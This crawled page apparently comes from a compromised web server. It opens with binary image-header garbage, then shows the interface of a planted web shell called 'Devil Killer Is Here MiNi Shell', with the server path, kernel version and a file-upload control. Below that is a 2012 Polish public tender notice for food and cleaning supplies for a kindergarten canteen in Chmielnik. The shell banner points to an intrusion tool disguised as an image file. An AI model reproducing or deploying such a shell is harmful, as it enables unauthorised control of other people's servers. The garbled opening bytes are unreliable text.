JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120720/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120720/262478-N-2012.html

<p class="kh_header"><b>Chmielnik: Dostawa produktów spożywczych i przemysłowych do stołówki przedszkolnej</b><br>
<b>Numer ogłoszenia: 262478 - 2012; data zamieszczenia: 20.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorządowe Przedszkole , ul. Sienkiewicza 8, 26-020 Chmielnik, woj. świętokrzyskie, tel. 41 354 22 66, faks 41 354 22 66.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa produktów spożywczych i przemysłowych do stołówki przedszkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych i przemysłowych stosownie do bieżących potrzeb do stołówki przedszkolnej w siedzibie Zamawiającego, zgodnie z warunkami wynikającymi z obowiązujących przepisów, w szczególności ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006 r. Nr 171, poz. 1225 z późn. zm.) w tym w szczególności:
- artykułów spożywczych (różnych),
- artykułów spożywczych mrożonych,
- mięsa, przetworów mięsnych,
- drobiu,
- ryb,
- warzyw i owoców,
- ziemniaków,
- jaj,
- mleka i produktów mleczarskich,
- pieczywa, świeżych wyrobów piekarskich,
- środków czystości.
Zamówienie obejmuje 11 części. Opis poszczególnych części zamówienia:
Część 1 - artykuły spożywcze (różne) :
1.Chrzan tarty 180g 20szt.
2.Przecier ogórkowy 0,37L 60szt.
3.Koncentrat buraczany 0,3L	 20szt.
4.Koncentrat pomidorowy 30% 200g  np. Pudliszki 200szt.
5.Zupa borowikowa opakowanie do 100g 7,5kg
6.Zupa pieczarkowa opakowanie do 100g 6kg
7.Zupa fasolowa opakowanie do 100g	10kg
8.Zupa grochowa opakowanie do 100g	12kg
9.Barszcz biały np. Winiary opakowanie do 100g	20kg
10.Przyprawa do kotletów mielonych 30g 70szt.
11.Przyprawa sucha do mięs, np. Delikat do mięs 75g 20szt.
12.Rosół drobiowy opakowanie - 6 kostek np. Winiary 240op.
13.Przyprawa do zup sucha np. Kucharek 33kg
14.Liść laurowy 15g np. Rewir 50szt.
15.Majeranek 10g np. Rewir	30szt.
16.Pieprz ziołowy opakowanie go 50g	3kg
17.Pieprz czarny mielony opakowanie go  50g	2kg
18.Ziele angielskie opakowanie  do 50g 2kg
19.Herbata granulowana opakowanie do 200g 2,5kg
20.Cukier (pakowany po 1 kg) 260kg
21.Cukier puder opakowanie do 1kg 15kg
22.Cukier waniliowy opakowanie do 50g 3,5kg
23.Proszek do pieczenia opakowanie do 50g 1,5kg
24.Dżem truskawkowy 500g	50szt.
25.Krem czekoladowy 630g np. Nutella 30szt.
26.Kakao rozpuszczalne 300g 50szt.
27.Sól (pakowana po 1 kg) 150kg
28.Majonez z zawartością min 7% żółtka jaja kurzego np. kielecki 30kg
29.Ketchup opakowanie do 0,5kg 28kg
30.Ryż  (pakowana po 1 kg)	40kg
31.Kasza jęczmienna perłowa 60kg
32.Mąka ziemniaczana 20kg
33.Mąka pszenna  typ 450	260kg
34.Makaron nitki np. Lubella   70kg
35.Makaron łazanki np. Lubella 30kg
36.Makaron świderki  np. Lubella 160kg
37.Drożdże piekarskie opakowanie 100g 7kg
38.Olej roślinny op. 1 L 300L
39.Masło klarowane (opakowania po 200g)  140kg
40.Paprykarz szczeciński opakowanie do 0,5kg	15kg
41.Pasztet drobiowy opakowanie do 0,5kg 20kg
42.Ryba wędzona	20kg
43.Ogórek konserwowy 0,9L	80szt.
44.Kawa zbozowa rozpuszczalna np.Inka 150g	50szt.
45.Sok truskawkowy w butelce 400L
46.Płatki śniadaniowe kulki o smaku czekoladowym opakowanie  do 1kg	45kg
47.Soczki w kartonikach 0,2L różne smaki 500szt.
48.Ciastka - herbatniki 50g	100szt.
Część 2 - artykuły spożywcze mrożone: 
1.Kalafior mrożony	18kg,
2.Zupy jarzynowe siedmioskładnikowe	20kg,
3.Knedle z truskawkami	180kg,
4.Truskawki mrożone	125kg
5.Kluski śląskie	100kg,
6.Pyzy z mięsem	45kg,
Część 3 - mięso, przetwory mięsne: 
1.Mięso z szynki (bez kości)	350kg,
2.Wołowe pieczeniowe 20kg,
3.Słonina	10kg.
Wędliny:
4.Polędwica 25kg
5.Szynka	25kg,
6.Kiełbasa szynkowa 25kg,
7.Kiełbasa krakowska 25kg,
8.Kiełbasa śląska	10kg,
9.Parówka wieprzowa minimum 50% mięsa  150kg,
10.Boczek wędzony 10kg,
Część 4 - drób: 
1.Filet z kurczaka (świeży)	150kg,
2.Udko z kurczaka (świeże)	150kg,
3.Korpus z kurczaka ze skrzydłami (świeży) 900kg,
Część 5 - ryby: 
1.Filet z dorsza (mrożony) do 30% glazury150kg,
Część 6 - warzywa i owoce: 
1.Cebula	30kg,
2.Marchew jadalna 300kg,
3.Seler (korzeń) 100kg,
4.Pietruszka (korzeń) 100kg,
5.Ogórek sałatkowy 80kg,
6.Pietruszka natka (w pęczkach) 30szt.
7.Koper świeży (w pęczkach)	30szt.
8.Rzodkiewka (w pęczkach)	30szt.
9.Kapusta biała (sztuka minimum 2kg) 40szt.
10.Kapusta czerwona (minimum 2kg)	30szt.
11.Kalafior (sztuka minimum 1,5kg)	50szt.
12.Buraki czerwone 100kg,
13.Botwina świeża w sezonie	20kg,
14.Kapusta kiszona	 150kg,
15.Kapusta pekińska ( sztuka minimum 1,2kg) 40szt.
16.Pomidory 20kg,
17.Gruszki w sezonie 200kg,
18.Jabłka	 400kg,
19.Śliwki w sezonie 30kg,
20.Truskawki świeże w sezonie 50kg,
21.Banany 100kg,
22.Kiwi 60kg,
23.Pomarańcze 100kg,
Część 7 - ziemniaki: 
1.Ziemniaki jadalne (w workach siatkowych po 15kg) 3 000kg,
Część 8 - jaja kurze: 
1. Jaja kurze (rozmiar minimum L)	2 300szt.
Część 9 - mleko i produkty mleczarskie:  
1. Serek waniliowy 140g 700 szt.
2. Jogurt owocowy różne smaki opakowanie do 150g 40 kg,
3. Ser biały półtłusty 250 kg,
4. Ser żółty typu Gouda	35 kg,
5. Mleko 2,5% 1 700 L,
6. Śmietana 30%	100 L,
7.Śmietana kremówka 150 L,
8. Masło Extra o zawartości min 82% tłuszczu (opakowanie po 200g)	80 kg,
Część 10 - pieczywo, świeże wyroby piekarskie: 
1. Chleb mieszany krojony 0,6kg 600szt.
2. Bułka zwykła pszenna 50g	 4 000 szt.
3. Rogal słodki z nadzieniem 100g 750szt.
4. Bułka słodka z nadzieniem 100g 750szt.
5. Bułka tarta 40kg.
Część 11 - środki czystości:  
1. Płyn do mycia naczyń (np. Ludwik) 100L,
2. Płyn do mycia szyb (z rozpylaczem) 0,5L 50szt.
3. Proszek do czyszczenia zlewów 0,5kg 80szt.
4. Proszek do prania 50kg,
5. Płyn czyszcząco - dezynfekujący do WC np. Domestos 100L,
6. Płyn do WC usuwający osad kamienny np. Tytan 50L,
7. Płyn do mycia i konserwacji drewna np. Sidoluks do drewna (0,5L)	30L,
8. Płyn do mycia naczyń w zmywarce 50L,
9. Nabłyszczasz do naczyń 10L,
10. Sól do zmywarki 20kg,
11. Udrażniacz do rur np. Kret 5kg,
12. Mydło w płynie antybakteryjne (op. 5L) 15L,
13. Rękawice gumowe grube rozmiar L	50 par,
14. Rękawice lateksowe niejałowe rozmiar M - 2 opakowania po 100 szt.
15. Papier toaletowy 400szt.
16. Ręczniki papierowe 100 szt.
17. Szczotki do zamiatania	20 szt.
18. Zmiotka z szufelką 10szt.
19. Mopy sznurkowe 50szt.
20. Worki na śmieci 60L 60szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt 7  ustawy Prawo zamówień publicznych stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy, jeżeli zmiana wykonawcy powodowałaby konieczność nabywania rzeczy o innych parametrach technicznych, co powodowałoby niekompatybilność techniczną lub nieproporcjonalnie duże trudności techniczne w użytkowaniu i dozorze, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego lub ograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 39.83.00.00-9, 39.83.12.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie według formuły spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie według formuły spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie według formuły spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie według formuły spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie według formuły spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ustalenia zawarte w  umowie  mogą ulec zmianie gdy:
-nastąpi zmiana ustawowej stawki podatku VAT,
-zwiększy się ilości dostarczanych produktów spożywczych ze względu na zwiększenie liczby wychowanków lub pracowników przedszkola uprawnionych do korzystania ze stołówki przedszkolnej.
- w przypadku ustawowej zmiany stawki podatku VAT Zamawiający może dokonać zmiany umowy w zakresie wynagrodzenia Wykonawcy, a ewentualna zmiana może nastąpić ze skutkiem od dnia ogłoszenia w Dzienniku Ustaw i wejścia w życie ustawy zmieniającej wysokość stawki podatku VAT do dnia zakończenia realizacji przedmiotu zamówienia, po złożeniu stosownego wniosku o dokonanie takiej zmiany przez Wykonawcę lub przez Zamawiającego,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chmielnik.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.chmielnik.com.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2012 godzina 10:00, miejsce: Przedszkole Samorządowe ul. Sienkiewicza 8, 26-020 Chmielnik gabinet Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> artykuły spożywcze (różne).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> artykuły spożywcze (różne):
1.Chrzan tarty 180g 20szt.
2. Przecier ogórkowy 0,37L 60szt.
3. Koncentrat buraczany 0,3L 20szt.
4. Koncentrat pomidorowy 30% 200g  np. Pudliszki 200szt.
5. Zupa borowikowa opakowanie do 100g 7,5kg
6. Zupa pieczarkowa opakowanie do 100g 6kg
7. Zupa fasolowa opakowanie do 100g	10kg
8. Zupa grochowa opakowanie do 100g 12kg
9. Barszcz biały np. Winiary opakowanie do 100g 20kg
10. Przyprawa do kotletów mielonych 30g 70szt.
11. Przyprawa sucha do mięs np. Delikat do mięs 75g 20szt.
12. Rosół drobiowy opakowanie - 6 kostek np. Winiary 240op.
13. Przyprawa do zup sucha np. Kucharek 33kg
14. Liść laurowy 15g np. Rewir 50szt.
15. Majeranek 10g np. Rewir	30szt.
16. Pieprz ziołowy opakowanie go 50g	3kg
17. Pieprz czarny mielony opakowanie go  50g	2kg
18. Ziele angielskie opakowanie  do 50g	2kg
19. Herbata granulowana opakowanie do 200g	2,5kg
20. Cukier (pakowany po 1 kg) 260kg
21. Cukier puder opakowanie do 1kg	15kg
22. Cukier waniliowy opakowanie do 50g 3,5kg
23. Proszek do pieczenia opakowanie do 50g	1,5kg
24. Dżem truskawkowy 500g 50szt.
25. Krem czekoladowy 630g np. Nutella 30szt.
26. Kakao rozpuszczalne 300g 50szt.
27. Sól (pakowana po 1 kg) 150kg
28. Majonez z zawartością min 7% żółtka jaja kurzego np.kielecki 30kg
29. Ketchup opakowanie do 0,5kg 28kg
30. Ryż (pakowana po 1 kg)	40kg
31. Kasza jęczmienna perłowa 60kg
32. Mąka ziemniaczana 20kg
33. Mąka pszenna  typ max 450 260kg
34. Makaron nitki (pięciojajeczny np. Lubella )  70kg
35. Makaron łazanki np. Lubella 30kg
36. Makaron świderki  np. Lubella 160kg
37. Drożdże piekarskie opakowanie 100g 7kg
38. Olej roślinny op. 1 L 300L
39. Masło klarowane (opakowanie po  200g) 140kg
40. Paprykarz szczeciński opakowanie do 0,5kg	15kg
41. Pasztet drobiowy opakowanie do 0,5kg 20kg
42. Ryba wędzona	20kg
43. Ogórek konserwowy 0,9L	 80szt.
44. Kawa zbozowa rozpuszczalna np. Inka 150g 50szt.
45. Sok truskawkowy w butelce 400L
46. Płatki śniadaniowe kulki o smaku czekoladowym opakowanie  do 1kg	45kg
47. Soczki w kartonikach 0,2L różne smaki 500szt.
48. Ciastka - herbatniki 50g	100szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Artykuły spożywcze mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - artykuły spożywcze mrożone 
1. Kalafior mrożony 18kg
2. Zupy jarzynowe siedmioskładnikowe 20kg
3.Knedle z truskawkami 180kg
4. Truskawki mrożone 125kg
5. Kluski śląskie	100kg
6.Pyzy z mięsem	45kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso, przetwory mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 - mięso, przetwory mięsne 
1.Mięso z szynki (bez kości)	350kg
2.Wołowe pieczeniowe 20kg
3.Słonina	10kg
Wędliny
4.Polędwica 25kg
5.Szynka	25kg
6.Kiełbasa szynkowa 25kg
7.Kiełbasa krakowska 25kg
8.Kiełbasa śląska 10kg
9.Parówka wieprzowa minimum 50% mięsa 150kg
10.Boczek wędzony 10kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4 - drób 
1.Filet z kurczaka (świeży)	150kg
2.Udko z kurczaka (świeże)	150kg
3.Korpus z kurczaka ze skrzydłami (świeży)	900kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 5 - ryby
1. Filet z dorsza (mrożony) do 30% glazury150kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 6 - warzywa i owoce 
1. Cebula	30kg
2. Marchew jadalna 300kg
3. Seler (korzeń) 100kg
4. Pietruszka (korzeń) 100kg
5. Ogórek sałatkowy 80kg
6. Pietruszka natka (w pęczkach) 30szt.
7. Koper świeży (w pęczkach) 30szt.
8. Rzodkiewka (w pęczkach)	30szt.
9. Kapusta biała (sztuka minimum 2kg) 40szt.
10. Kapusta czerwona (minimum 2kg)	30szt.
11. Kalafior (sztuka minimum 1,5kg)	50szt.
12. Buraki czerwone 100kg
13. Botwina świeża w sezonie 20kg
14. Kapusta kiszona 150kg
15. Kapusta pekińska (sztuka minimum 1,2kg) 40szt.
16. Pomidory 20kg
17. Gruszki w sezonie 200kg
18. Jabłka 400kg
19. Śliwki w sezonie 30kg
20. Truskawki świeże w sezonie 50kg
21. Banany 100kg
22. Kiwi	60kg
23. Pomarańcze	100kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ziemniaki jadalne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 7 - ziemniaki 
1.Ziemniaki jadalne (w workach siatkowych po 15kg) 3 000kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
